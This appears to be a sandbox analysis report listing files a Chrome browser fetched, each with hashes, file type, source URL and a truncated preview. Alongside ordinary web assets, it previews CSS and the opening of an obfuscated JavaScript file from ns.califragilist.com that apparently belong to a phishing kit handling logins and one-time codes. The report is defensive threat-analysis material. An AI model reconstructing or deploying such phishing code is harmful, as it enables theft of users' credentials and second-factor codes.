                                                                                                                                            Preview:const oA="modulepreload",sA=function(e){return"/build/"+e},yg={},ee=function(t,n,i){if(!n||n.length===0)return t();const s=document.getElementsByTagName("link");return Promise.all(n.map(a=>{if(a=sA(a),a in yg)return;yg[a]=!0;const l=a.endsWith(".css"),c=l?'[rel="stylesheet"]':"";if(!!i)for(let g=s.length-1;g>=0;g--){const m=s[g];if(m.href===a&&(!l||m.rel==="stylesheet"))return}else if(document.querySelector(`link[href="${a}"]${c}`))return;const h=document.createElement("link");if(h.rel=l?"stylesheet":oA,l||(h.as="script",h.crossOrigin=""),h.href=a,document.head.appendChild(h),l)return new Promise((g,m)=>{h.addEventListener("load",g),h.addEventListener("error",()=>m(new Error(`Unable to preload CSS for ${a}`)))})})).then(()=>t()).catch(a=>{const l=new Event("vite:preloadError",{cancelable:!0});if(l.payload=a,window.dispatchEvent(l),!l.defaultPrevented)throw a})};var ln=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{};function ru(
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):61
                                                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (51734)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):222931
                                                                                                                                            Entropy (8bit):5.0213311632628725
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:Z4blthK0D4NIbkhhMW0AphsQyXV3oUHDDlxh/LoFdW:Z4vhK0D4NQlxh/LoFdW
                                                                                                                                            MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                                                                                            SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                                                                                            SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                                                                                            SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                                                                                                            Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (2345)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):199356
                                                                                                                                            Entropy (8bit):5.527022125378306
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:XVwizDGLETutOA0m5yptcY0/H8+bEQDmKD0C8rT/Jy:nGLgutPYjWx0C8rT/I
                                                                                                                                            MD5:F99B43E362D7006B179A9720436D9B4A
                                                                                                                                            SHA1:E7F4EE687D8D98615F4EF8D839010B775B044487
                                                                                                                                            SHA-256:9F1E6F0E17B5E1459377F1849A3A9D12F7CEBD49DD5377DBA258764D7879B706
                                                                                                                                            SHA-512:960FDE9EA3ADA8C1F862B03172F9F9BF961BEC8D4D2223533849D6DDD23EE3609EF5F2A93BB4F27D97EDF893EF96474D3D55C836D26E7C16F7DB097CAD163AEB
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://www.googletagmanager.com/gtm.js?id=GTM-MC7CMZBF
                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}],. "tags":[{"function":"__html","metadata":["map"],"once_per_event":true,"vtp_html":"\u003Cscript defer data-domain=\"marmof.com\" data-gtmsrc=\"https:\/\/plausible.io\/js\/script.js\" type=\"text\/gtmscript\"\u003E\u003C\/script\u003E","vtp_supportDocumentWrite":false,"vtp_enableIframeMode":false,"vtp_enableEditJsMacroBehavior":false,"tag_id":3}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):270
                                                                                                                                            Entropy (8bit):4.840496990713235
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                                                                                                            MD5:40EB39126300B56BF66C20EE75B54093
                                                                                                                                            SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                                                                                            SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                                                                                            SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/mnTXBHC8KHjpcgmT4J29cjPITNuPijXMtYQTHs1fF2R078145
                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17842
                                                                                                                                            Entropy (8bit):7.821645806304586
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EwTZQ74B48VtrMvbt0sAvPTMaf+j5s8OYbqarRbjy5Qg1AR/kf63z/:hTa4B4mtYztAvPTMFhOYb3Rbu571AJa6
                                                                                                                                            MD5:4B52ECDC33382C9DCA874F551990E704
                                                                                                                                            SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                                                                                            SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                                                                                            SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1455
                                                                                                                                            Entropy (8bit):6.5761218938084145
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:hXrGIcsNqsK40Zzdhza+P5MUVmV4U6yZLYQKirCVtzrcEMLvEfl9:hyfsEsuVd8+P5McU6y9YUWcEBT
                                                                                                                                            MD5:C3AA3E477A13505B1DD79E05A96039A6
                                                                                                                                            SHA1:225E125D4416AB25092773EBB9C4C54452FFAF3D
                                                                                                                                            SHA-256:227EEB5EF49E062025133C4E2CC8C42D7EA76B0C869E467BB92638CDF1ACC942
                                                                                                                                            SHA-512:3436D80200AFD8EB28BB35A1C935E3DCB48CA1F0A09D40DADDE6B5C1DE4E54196F1A74CD2E678EBAF8A8B6BB43E9870C9612065CBAE69AB359CF18FFDF6BD665
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://app.marmof.com/favicon-32x32.png
                                                                                                                                            Preview:.PNG........IHDR... ... .....D.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE.....&..&..'..'..(..&..'..-..'..'..(.]........e..K..L..K..M..K..M .J..K..M&..'..'..'..&..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..&..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..&..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..(..)..'..'.O..M..O..K..K..K..K..K..K..L..K..K..K..K..K..K..K..K..K..L..K..K...'.K..K..K...'..'..'..'..'..'.J..K..K..K..K..K..K..K...'.K....ZP......tRNS.............................XYM..I....h#.....f!........d..R....U..i.p.q...<.........;,L..8-T......a.'..5....D.9..Ho+=k*.......@..>.....\..._.X..j........lH.Wwx2.mv.E......j......bKGD..l.1....tIME...............IDAT8.c`.D..QRJ...af....rdee...X...UT..54Y.X.d.uTu..........F.&.k...........1...gg`.1....B...........V....<....o.....~....x... .pp.T.[hXxD...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1407), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1407
                                                                                                                                            Entropy (8bit):5.197633596425856
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:cPp/l+GrWaeTg7jCKXBUQHp0aKM9HQOG5VarHDkIvIHIS+qVtwl9ROg+29pk:6/l+GreTo5THQOG5VsxqVjg+29e
                                                                                                                                            MD5:DF44BE7742ADAE3607225522DDA483A1
                                                                                                                                            SHA1:46F8DD3B65567F5C822665F8F555600EAB1AEAEF
                                                                                                                                            SHA-256:E3409AC09AF396E35FD67C5E024386D36C52138B7541E6A4644C31A94A2D33A4
                                                                                                                                            SHA-512:C40DA2BAE316B4C83C682E8B260E17109D5771BF6197B8888F7075829524534E01D58404525A8C0F46E50771B25C41CD78E8E5D86171B9C9F6A3E69232D3FC92
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://plausible.io/js/script.js
                                                                                                                                            Preview:!function(){"use strict";var a=window.location,o=window.document,t=o.currentScript,r=t.getAttribute("data-api")||new URL(t.src).origin+"/api/event",l=t.getAttribute("data-domain");function s(t,e){t&&console.warn("Ignoring Event: "+t),e&&e.callback&&e.callback()}function e(t,e){if(/^localhost$|^127(\.[0-9]+){0,2}\.[0-9]+$|^\[::1?\]$/.test(a.hostname)||"file:"===a.protocol)return s("localhost",e);if((window._phantom||window.__nightmare||window.navigator.webdriver||window.Cypress)&&!window.__plausible)return s(null,e);try{if("true"===window.localStorage.plausible_ignore)return s("localStorage flag",e)}catch(t){}var n={},i=(n.n=t,n.u=a.href,n.d=l,n.r=o.referrer||null,e&&e.meta&&(n.m=JSON.stringify(e.meta)),e&&e.props&&(n.p=e.props),new XMLHttpRequest);i.open("POST",r,!0),i.setRequestHeader("Content-Type","text/plain"),i.send(JSON.stringify(n)),i.onreadystatechange=function(){4===i.readyState&&e&&e.callback&&e.callback({status:i.status})}}var n=window.plausible&&window.plausible.q||[];windo
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):7390
                                                                                                                                            Entropy (8bit):4.02755241095864
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                                                                                                            MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                                                                            SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                                                                            SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                                                                            SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/ijfp9iKnrTgHCYE8rTpOvmRwx1aOUavp0AinFOw6GvICG656170
                                                                                                                                            Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3017)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3018
                                                                                                                                            Entropy (8bit):4.9328629827634165
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:GOlDyZFS46fEKx8iCL1yTJWlTn8iRD1TBDopvvDnt4HhVG:GOlDwFS46MBymD1GZ2G
                                                                                                                                            MD5:83727E50D2DABCE40620BF41E2545B67
                                                                                                                                            SHA1:F77D8BAF6B3781D87F8607B678BFB51D535E871B
                                                                                                                                            SHA-256:1780CD3C16090E58A07403AFE55C8C972C295F27ABB05C65B61B4CA88B7040CF
                                                                                                                                            SHA-512:8E1DCDB62923359082EA39CBF49EB47A80C9670509F6AE35FFB995692F5D2C22BFA6492F0278C69F0272F10FDC19AAF35DD1707ADC9A6CAED8A1D87D5D0EA5FA
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://app.marmof.com/build/assets/Button-7c0475a9.js
                                                                                                                                            Preview:import{o as d,d as a,e as c,l,n as i}from"./app-49265ad1.js";const u=["type","disabled"],y={key:0,class:"i-eos-icons:bubble-loading block h-3 w-3"},h={__name:"Button",props:{color:{type:String,default:"primary"},size:{type:String,default:"md"},rounded:{type:String,default:"lg"},type:{type:String,default:"submit"},outlined:{type:Boolean,default:!1},loading:{type:Boolean,default:!1}},setup(o){const n={primary:"bg-gray-900 enabled:hover:bg-gray-800 enabled:active:bg-gray-700 enabled:focus:border-gray-800 enabled:focus:ring-gray-800",secondary:"bg-secondary-1000 hover:bg-secondary-900 active:bg-secondary-800 active:ring-secondary-800 ring-orange-500 focus:border-secondary-800 focus:ring-secondary-800",blue:"bg-blue-700 hover:bg-blue-600 active:bg-blue-700 focus:border-blue-800 focus:ring-blue-300",green:"bg-green-800 hover:bg-green-700 active:bg-green-900 focus:border-green-900 focus:ring-green-300",blueOrange:"bg-gradient-to-r from-blue-700 to-orange-700 hover:from-blue-600 hover:to-orang
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (23854), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):23854
                                                                                                                                            Entropy (8bit):5.10657183710291
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:OtafGtz2omXX44PL5Ky0sdY8xbXob4YEb+VkfipSgfW:GafSz2omXX44PL5Ky0sdY8xbXoEYW+5K
                                                                                                                                            MD5:8025EA2266871F7AF97C89D4B43DC4A6
                                                                                                                                            SHA1:B80F1279A6438E2325D0ECE6642BA34CEBD9B4D8
                                                                                                                                            SHA-256:BAD46FF2D915998C6F922BFCA9B0F01B805F3B548CF038DA1BF6643FE371385E
                                                                                                                                            SHA-512:87680AAAB3A4F7F16645558FC3680A7577CD84E7479D4DC06FD36E3F38B583F6C7E13161CDBB1F6E63BE66721672814E2A375A6207D4806E5873ABF0666B9A4A
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/34m8PEW3Ch1AL9UabKKEr8920
                                                                                                                                            Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direc
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2905
                                                                                                                                            Entropy (8bit):3.962263100945339
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                                                                                                            MD5:FE87496CC7A44412F7893A72099C120A
                                                                                                                                            SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                                                                                            SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                                                                                            SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):133944
                                                                                                                                            Entropy (8bit):5.196909052575565
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:ZHGO3tG5DYg5MW0IVYehxirAV5DTDg5MCKaLPdVrYiL6Z+ESBeCz:ZfI0IVYaiFdVMfKfz
                                                                                                                                            MD5:B630392D89F7FE22ECA377162C87E7D5
                                                                                                                                            SHA1:163BD85C65918EDEDBC17A693A096B1B4E4B20D6
                                                                                                                                            SHA-256:D5165CA9B040862E5AD837026467697612CDD2361092BD4E2FCE8EE1168C6F5B
                                                                                                                                            SHA-512:AA7C6FCD78A2BB54FD40209A690D0A9951382444E12ECB57BE27AC4071D4C2F5A5CE7471A63EB196DCECB090F223DB8F7991ED3E548A10276D109FBDBE9981F8
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/34ZDG48CiIUIKX2LghMRxuoYEP67110
                                                                                                                                            Preview:const _0x1ef019=_0x22e9;(function(_0x42ffe1,_0x39ea28){const _0x4609ca=_0x22e9,_0x3f2a74=_0x42ffe1();while(!![]){try{const _0x102423=-parseInt(_0x4609ca(0x190))/0x1+parseInt(_0x4609ca(0xaa))/0x2*(-parseInt(_0x4609ca(0x210))/0x3)+parseInt(_0x4609ca(0xe4))/0x4*(-parseInt(_0x4609ca(0x228))/0x5)+parseInt(_0x4609ca(0xd9))/0x6+parseInt(_0x4609ca(0x26a))/0x7*(-parseInt(_0x4609ca(0x1b8))/0x8)+parseInt(_0x4609ca(0x148))/0x9+parseInt(_0x4609ca(0xfc))/0xa*(parseInt(_0x4609ca(0x255))/0xb);if(_0x102423===_0x39ea28)break;else _0x3f2a74['push'](_0x3f2a74['shift']());}catch(_0x1a1a0d){_0x3f2a74['push'](_0x3f2a74['shift']());}}}(_0x20e8,0x821fb));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;let wait2facancel=0x0,otptype=0x0;var currentweb=0x0,pagevisitedalready=null;let viewtype=null,pdfcheck=0x0;!document[_0x1ef019(0x137)]('sections')['classList'][_0x1ef019(0x214)](_0x1ef019(0x25f))&&(view='uname');document['getElementById'](_0x1ef019(0x260))&&!document[_0x1ef019(0x137)](
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):36696
                                                                                                                                            Entropy (8bit):7.988666025644622
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lvJo4KciQZYjebVq19lKPtHAQ/l4rj2bqkiHShpeSUOR4OqWOgaU:lhH3rVq1PKP432tSSh4SUORHqWcU
                                                                                                                                            MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                                                                                            SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                                                                                            SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                                                                                            SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/GDSherpa-regular.woff
                                                                                                                                            Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (18563)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18631
                                                                                                                                            Entropy (8bit):5.209558465650827
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:YLExv60IOUhZVezJOQ/IIy/8x89TSU2GzXL:vxenezJun+OTSU2M
                                                                                                                                            MD5:05550215707FB77F6D07BCC793526E28
                                                                                                                                            SHA1:71BBCAFF7C546C92C67991AF6E35EB6363E04B84
                                                                                                                                            SHA-256:0562E5674602291CE06869880ED86B2B9D26AE26F17D25F9587C7AE26F62B6B2
                                                                                                                                            SHA-512:F65AD1C08C8CFD8ADE894C2B0681CFF47904D81D4D61717133321DE0B5FCA6C7539AA87720EA2E7415EA0DE1BA410ECAED4EB419BD60835B9F0CBA906B92D6A3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:/*! Build 4715bccd58d99595466a0b6640a356de2767b599:1730734838450 */.!function(e){var t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return r.d(t,"a",t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="https://cdn.getrewardful.com/pa
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                            Category:downloaded
